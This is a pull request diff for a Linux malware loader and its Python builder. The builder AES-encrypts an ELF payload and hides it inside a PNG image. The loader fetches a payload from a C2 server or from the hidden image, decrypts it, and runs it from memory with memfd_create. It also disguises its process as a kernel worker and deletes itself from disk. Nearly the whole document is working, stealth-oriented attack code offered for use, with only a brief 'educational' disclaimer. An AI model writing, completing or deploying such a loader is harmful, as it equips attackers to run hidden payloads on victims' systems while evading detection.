### PR TITLE
Encrypted Payload Support and Configurable Loader

### DIFF
--- a/loader/README.md
+++ b/loader/README.md
@@ -37,8 +37,8 @@ You define all parameters in a `config.json` file. The Python builder script (`b
   "C2_IP": "127.0.0.1",
   "C2_PORT": 4444,
   "FAKE_PROC": "[kworker/u:1]",
-  "FD_NAME": "hidden",
-  "PROC_LINK": "",
+  "FD_NAME": "error",
+  "PROC_LINK": "/tmp/.kworker",
   "EXTRACT_PATH": "/tmp/payload.img",
   "MARKER": "ENCRYPTED_PAYLOAD"
 }

--- a/loader/README.md
+++ b/loader/README.md
@@ -28,19 +28,19 @@ You define all parameters in a `config.json` file. The Python builder script (`b
 
 ```json
 {
-  "image": "input.png",
-  "binary": "payload.elf",
-  "password": "supersecret",
-  "output": "out.png",
   "loader": "loader.c",
-  "patched": "loader_patched.c",
-  "C2_IP": "192.168.1.10",
+  "loader_build": "loader_build.c",
+  "image": "original.png",
+  "payload": "payload.elf",
+  "image_payload": "encrypted.png",
+  "password": "encrypted",
+  "C2_IP": "127.0.0.1",
   "C2_PORT": 4444,
-  "FAKE_PROC": "[kworker/0:1-events]",
-  "FD_NAME": "error",
-  "PROC_LINK": "/tmp/.cache-update",
-  "EXTRACT_PATH": "/tmp/.hidden.png",
-  "marker": "ENCRYPTED_PAYLOAD"
+  "FAKE_PROC": "[kworker/u:1]",
+  "FD_NAME": "hidden",
+  "PROC_LINK": "",
+  "EXTRACT_PATH": "/tmp/payload.img",
+  "MARKER": "ENCRYPTED_PAYLOAD"
 }
 ```
 

--- a/loader/builder.py
+++ b/loader/builder.py
@@ -1,0 +1,87 @@
+import argparse
+import os
+import json
+from hashlib import sha256
+from Crypto.Cipher import AES
+from Crypto.Random import get_random_bytes
+
+
+def pad(data):
+    pad_len = 16 - (len(data) % 16)
+    return data + bytes([pad_len] * pad_len)
+
+
+def bytes_to_c_array(name, byte_array):
+    return f"unsigned char {name}[{len(byte_array)}] = {{ {', '.join(str(b) for b in byte_array)} }};"
+
+
+def main():
+    parser = argparse.ArgumentParser(description="Embed encrypted binary into image and generate patched loader.")
+    parser.add_argument("--config", required=True, help="Path to JSON config file")
+    args = parser.parse_args()
+
+    # Load config
+    with open(args.config, "r") as f:
+        config = json.load(f)
+
+    image_path = config["image"]
+    binary_path = config["payload"]
+    password = config["password"]
+    output_path = config.get("image_payload", "")
+    loader_path = config.get("loader", "")
+    patched_path = config.get("loader_build", "")
+    # Patch loader
+    with open(loader_path, "r") as f:
+        loader_code = f.read()
+    if password:
+        # Read files
+        with open(image_path, "rb") as f:
+            image_data = f.read()
+        with open(binary_path, "rb") as f:
+            binary_data = f.read()
+
+        # Generate key and IV
+        key = sha256(password.encode()).digest()  # 32 bytes
+        iv = get_random_bytes(16)
+
+        # Encrypt binary
+        cipher = AES.new(key, AES.MODE_CBC, iv)
+        encrypted = cipher.encrypt(pad(binary_data))
+
+        # Append to image with marker
+        with open(output_path, "wb") as f:
+            f.write(image_data)
+            f.write(config["MARKER"].encode())
+            f.write(iv)
+            f.write(encrypted)
+        
+        print(f"[*] Output image written to: {output_path}")
+        
+        key_c = bytes_to_c_array("key", key)
+        iv_c = bytes_to_c_array("iv", iv)
+
+        loader_code = loader_code.replace("__KEY__", ', '.join(str(b) for b in key))
+        loader_code = loader_code.replace("__IV__", ', '.join(str(b) for b in iv))
+
+    else:
+        print(f"[*] Non encrypted payload!")
+
+    replacements = {
+        "{__C2_IP__}": f'"{config["C2_IP"]}"',
+        "{__C2_PORT__}": f'{config["C2_PORT"]}',
+        "{__FAKE_PROC__}": f'"{config["FAKE_PROC"]}"',
+        "{__FD_NAME__}": f'"{config["FD_NAME"]}"',
+        "{__PROC_LINK__}": f'"{config["PROC_LINK"]}"',
+        "{__EXTRACT_PATH__}": f'"{config["EXTRACT_PATH"]}"',
+        "{__MARKER__}": f'"{config["MARKER"]}"',
+    }
+    for k, v in replacements.items():
+        loader_code = loader_code.replace(k, v)
+        with open(patched_path, "w") as f:
+            f.write(loader_code)
+
+    print(f"[*] Patched loader written to: {patched_path}")
+
+
+if __name__ == "__main__":
+    main()

--- a/loader/builder.py
+++ b/loader/builder.py
@@ -64,6 +64,8 @@ def main():
         loader_code = loader_code.replace("__IV__", ', '.join(str(b) for b in iv))
 
     else:
+        loader_code = loader_code.replace("{__KEY__}", '{' + ', '.join(['0'] * 32) + '}')
+        loader_code = loader_code.replace("{__IV__}",  '{' + ', '.join(['0'] * 16) + '}')
         print(f"[*] Non encrypted payload!")
 
     replacements = {
@@ -81,7 +83,6 @@ def main():
             f.write(loader_code)
 
     print(f"[*] Patched loader written to: {patched_path}")
-
 
 if __name__ == "__main__":
     main()

--- a/loader/config.json
+++ b/loader/config.json
@@ -8,8 +8,8 @@
   "C2_IP": "127.0.0.1",
   "C2_PORT": 4444,
   "FAKE_PROC": "[kworker/u:1]",
-  "FD_NAME": "hidden",
-  "PROC_LINK": "",
+  "FD_NAME": "error",
+  "PROC_LINK": "/tmp/.kworker",
   "EXTRACT_PATH": "/tmp/payload.img",
   "MARKER": "ENCRYPTED_PAYLOAD"
 }

--- a/loader/config.json
+++ b/loader/config.json
@@ -1,0 +1,15 @@
+{
+  "loader": "loader.c",
+  "loader_build": "loader_build.c",
+  "image": "original.png",
+  "payload": "payload.elf",
+  "image_payload": "encrypted.png",
+  "password": "encrypted",
+  "C2_IP": "127.0.0.1",
+  "C2_PORT": 4444,
+  "FAKE_PROC": "[kworker/u:1]",
+  "FD_NAME": "hidden",
+  "PROC_LINK": "",
+  "EXTRACT_PATH": "/tmp/payload.img",
+  "MARKER": "ENCRYPTED_PAYLOAD"
+}

--- a/loader/loader.c
+++ b/loader/loader.c
@@ -4,29 +4,38 @@
  * ---------------------------------------------------------------------------
  *  Summary:
  *  This tool implements a fileless, in-memory ELF loader for Linux systems.
- *  It connects to a remote C2 (Command & Control) server over TCP, downloads
- *  a raw ELF payload, and executes it entirely from memory using memfd_create().
+ *  It optionally decrypts a payload embedded in a carrier file or downloads 
+ *  one from a remote C2 (Command & Control) server over TCP, and executes it 
+ *  entirely from memory using memfd_create().
  *
  *  Key Features:
  *  - Uses memfd_create() to create a memory-backed, executable file descriptor
- *  - Pulls payload from a configurable C2 IP and port over a socket connection
- *  - Executes the ELF binary directly from memory via /proc/self/fd/<fd>
- *  - Applies a fake process name (argv[0]) for stealth in `ps`, `top`, etc.
+ *  - Executes an ELF binary directly from memory via /proc/self/fd/<fd>
+ *  - Optionally pulls the payload from a configurable C2 IP and port
+ *  - Applies a fake process name (argv[0]) for stealth in ps, top, etc.
+ *  - Optionally links the process to a custom name in /proc/<pid>/status
  *  - Deletes itself from disk (via unlink("/proc/self/exe")) after execution
  *  - Leaves no payload or loader trace on the filesystem after startup
+ *  - Optionally decrypts an embedded payload using AES-CBC with a configurable marker
+ *  - Skips re-download if a local persisted (EXTRACT_PATH) copy exists
  *
  *  Typical Use:
  *    1. Compile the loader:
- *         $  gcc -o loader loader.c
+ *         $  gcc -o loader loader.c -lcrypto
  *    2. Start a listener to serve the payload binary:
- *         $ ncat -lvnp 1111 < payload.elf
- *    3. Execute the loader:
- *         $ ./loader
+ *         $  ncat -lvnp 1111 < payload.elf
+ *    3. Execute the loader (loads from image or C2):
+ *         $  ./loader
+ *
+ *  Optional Behavior:
+ *    - If EXTRACT_PATH is defined and exists, use it as a payload cache.
+ *    - If the marker is detected in the payload, AES decryption is applied.
  *
  *  Warning:
- *  This code is for for educational and authorized use only. Do not use on 
+ *  This code is for educational and authorized use only. Do not use on 
  *  systems you do not own or have explicit permission to operate on.
  */
+
 
 #define _GNU_SOURCE
 #include <stdio.h>
@@ -39,63 +48,143 @@
 #include <arpa/inet.h>
 #include <limits.h>
 #include <signal.h>
+#include <openssl/evp.h>
+#include <openssl/aes.h>
 
 #ifndef __NR_memfd_create
 #define __NR_memfd_create 279
 #endif
-
+#define BUF_SIZE 4096
 extern char **environ;
 
 // Parameters
-const char *C2_IP        = "127.0.0.1";              // C2 IP
-const int   C2_PORT      = 1111;                     // C2 port
-const char *FAKE_PROC    = "[kworker/0:1-events]";   // Shown in `ps` output
-const char *FD_NAME      = "error";                  // Shown in `cat /proc/<pid>/maps` as `[memfd:error (deleted)]`
-const char *PROC_LINK    = "";                       // Detault empty. Shown in `cat /proc/<pid>/status` as `Name: <filename>`.
+const char *C2_IP        = {__C2_IP__};         // C2 IP
+const int   C2_PORT      = {__C2_PORT__};       // C2 port
+const char *FAKE_PROC    = {__FAKE_PROC__};     // Shown in `ps` output
+const char *FD_NAME      = {__FD_NAME__};       // Shown in `cat /proc/<pid>/maps` as `[memfd:error (deleted)]`
+const char *PROC_LINK    = {__PROC_LINK__};     // Detault empty. Shown in `cat /proc/<pid>/status` as `Name: <filename>`.
+const char *EXTRACT_PATH = {__EXTRACT_PATH__};  // Detault empty. Used for persistence to have the encrypted payload locally hidden on a picture.
+const char *MARKER       = {__MARKER__};        // Characters to mark the beginning of the encrypted payload    
+unsigned char key[32]    = {__KEY__};           // Populated by builder
+unsigned char iv[16]     = {__IV__};            // Populated by builder
+
+unsigned char *decrypt_aes(const unsigned char *data, int len, const unsigned char *key, const unsigned char *iv, int *out_len) {
+    EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
+    unsigned char *out = malloc(len + AES_BLOCK_SIZE);
+    int len1, len2;
+    EVP_DecryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, key, iv);
+    EVP_DecryptUpdate(ctx, out, &len1, data, len);
+    EVP_DecryptFinal_ex(ctx, out + len1, &len2);
+    *out_len = len1 + len2;
+    EVP_CIPHER_CTX_free(ctx);
+    return out;
+}
+// Seek, read, and decrypt the file content
+unsigned char *process_payload(FILE *f, size_t *out_size, int *payload_len) {
+    fseek(f, 0, SEEK_END);
+    *out_size = ftell(f);
+    rewind(f);
+
+    unsigned char *raw = malloc(*out_size);
+    if (!raw) {
+        perror("malloc failed");
+        return NULL;
+    }
+
+    fread(raw, 1, *out_size, f);
+    fclose(f);
+
+    // Check for marker
+    char *marker = memmem(raw, *out_size, MARKER, strlen(MARKER));
+    unsigned char *payload = NULL;
+
+    if (marker) {
+        unsigned char *iv_start = (unsigned char *)(marker + strlen(MARKER));
+        unsigned char *enc_data = iv_start + 16;
+        int enc_len = raw + *out_size - enc_data;
+        payload = decrypt_aes(enc_data, enc_len, key, iv_start, payload_len);
+        free(raw);  // Free encrypted blob
+    } else {
+        payload = raw;
+        *payload_len = *out_size;
+    }
+
+    return payload;
+}
+
 // SYS_call wrapper for memfd_create
 static inline int memfd_create(const char *name, unsigned int flags) {
     return syscall(__NR_memfd_create, name, flags);
 }
 // Execute payload from memory without exposing /proc path
 int exec_memfd(int fd, char **argv, char **envp) {
-    return execveat(fd, "", argv, envp, AT_EMPTY_PATH);
+    lseek(fd, 0, SEEK_SET);  // rewind file descriptor
+    return fexecve(fd, argv, envp);
 }
 int main(int argc, char **argv) {
     int sock, fd, n;
     struct sockaddr_in addr;
     char buffer[BUF_SIZE];
     char *exec_argv[] = {(char *)FAKE_PROC, NULL};
-    // Build sockaddr
-    memset(&addr, 0, sizeof(addr));
-    addr.sin_family = AF_INET;
-    addr.sin_port = htons(C2_PORT);
-    inet_pton(AF_INET, C2_IP, &addr.sin_addr);
-    // Connect to C2
-    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
-        perror("socket");
-        exit(EXIT_FAILURE);
-    }
-    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
-        perror("connect");
-        close(sock);
-        exit(EXIT_FAILURE);
-    }
-    // Create anonymous memory-backed file
+    unsigned char *payload = NULL;
+    int payload_len = 0;
+    size_t raw_size = 0;
+    FILE *f = NULL;
+
+    // Always create the memfd before payload handling
     if ((fd = memfd_create(FD_NAME, 0)) < 0) {
         perror("memfd_create");
-        close(sock);
         exit(EXIT_FAILURE);
     }
-    // Read and write payload into memfd
-    while ((n = read(sock, buffer, sizeof(buffer))) > 0) {
-        if (write(fd, buffer, n) != n) {
-            perror("write");
+
+    if (EXTRACT_PATH && strlen(EXTRACT_PATH) > 0 && access(EXTRACT_PATH, F_OK) == 0) {
+        // Load from disk
+        f = fopen(EXTRACT_PATH, "rb");
+        if (!f) {
+            perror("fopen extract path");
+            exit(EXIT_FAILURE);
+        }
+    } else {
+        // Connect to C2
+        memset(&addr, 0, sizeof(addr));
+        addr.sin_family = AF_INET;
+        addr.sin_port = htons(C2_PORT);
+        inet_pton(AF_INET, C2_IP, &addr.sin_addr);
+
+        if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
+            perror("socket");
+            exit(EXIT_FAILURE);
+        }
+        if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
+            perror("connect");
             close(sock);
             exit(EXIT_FAILURE);
         }
-        if (n < BUF_SIZE) break;
+
+        FILE *tmp = tmpfile();
+        while ((n = read(sock, buffer, sizeof(buffer))) > 0) {
+            fwrite(buffer, 1, n, tmp);
+        }
+        close(sock);
+        f = tmp;
+
+        // Save for persistence if desired
+        if (EXTRACT_PATH && strlen(EXTRACT_PATH) > 0) {
+            rewind(tmp);
+            FILE *outf = fopen(EXTRACT_PATH, "wb");
+            while ((n = fread(buffer, 1, sizeof(buffer), tmp)) > 0) {
+                fwrite(buffer, 1, n, outf);
+            }
+            fclose(outf);
+            rewind(tmp);
+        }
     }
-    close(sock);
+
+    // Decrypt or extract payload from file
+    payload = process_payload(f, &raw_size, &payload_len);
+
+    // Write to memfd
+    write(fd, payload, payload_len);
     // Self-delete loader
     char exe_path[PATH_MAX] = {0};  
     ssize_t len = readlink("/proc/self/exe", exe_path, sizeof(exe_path) - 1);
@@ -144,3 +233,4 @@ int main(int argc, char **argv) {
     }
     return 0;
 }
+


### PR DESCRIPTION
This update adds support for encrypted payloads and introduces a Python-based builder to generate a patched loader with values from a config file.

Key Changes
- Builder (builder.py): Reads config.json and outputs:
   - An image with embedded encrypted ELF payload (if password is provided)
   - A patched loader.c with injected values (C2 IP, port, keys, marker, etc.)
- Encryption Support:
   - AES-256-CBC encryption using a password-derived SHA-256 key
   - Payload appended after a custom marker and random IV
- Loader Enhancements:
   - Supports reading payload from:
      - Remote server (plain or encrypted)
      - Local path (EXTRACT_PATH)
   - Three execution modes:
      - In-memory via memfd_create()
      - Temporary symlink execution (PROC_LINK)
      - Local persistence (optional write of encrypted file)
